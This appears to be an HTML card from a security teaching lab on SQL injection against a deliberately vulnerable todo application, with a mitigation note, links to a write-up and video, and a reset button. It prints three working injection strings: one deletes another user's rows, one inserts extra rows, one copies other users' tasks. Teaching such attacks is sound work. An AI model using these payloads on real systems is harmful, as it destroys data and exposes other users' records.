<div class="card bg-light mb-3" style="max-width: 25rem;">
  <div class="card-header">Exploit & Mitigation</div>
  <div class="card-body">
    <h5 class="card-title">SQL Injection</h5>
    <p class="card-text">
      <strong>Exploit</strong> Insert malicious data into the application to destroy other users' data</p>
    <p class="card-text">
      <strong>Mitigation</strong> Perform server-side validation and parameterize user-supplied data before use.</p>
    <a href="https://docs.google.com/document/d/1vLt9DB0CV0_kHoa0WplpEvBNjAS3xPlZbVjL0GrMCsg" target="_blank"><strong>Write Up</strong></a> | 
    <a href="https://media.oregonstate.edu/media/t/1_yptnsj7l" target="_blank"><strong>Video</strong></a>
    <br>
    <br>
    <form action="{{endpoint}}/reset-user1" method="post">
      <button type="submit" class="btn btn-lg btn-primary">Reset user1</button>
    </form>
    
    <br>
    <strong>Destructive injection</strong>
    <br>
    <code>Say goodbye, user1', 0, '1'); DELETE FROM todo WHERE user_id = '1'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('All gone</code>
    
    <br>
    <strong>Nondestructive injection</strong>
    <br>
    <code>A first task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A second task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A final task</code>
    
    <br>
    <strong>Access other users' data</strong>
    <br>
    <code>vvvvvStart of other user tasksvvvvv', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) SELECT task_description, task_complete, '{{user_id}}' FROM todo WHERE user_id != '{{user_id}}'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('^^^^^End of other user tasks^^^^^</code>
  </div>
</div>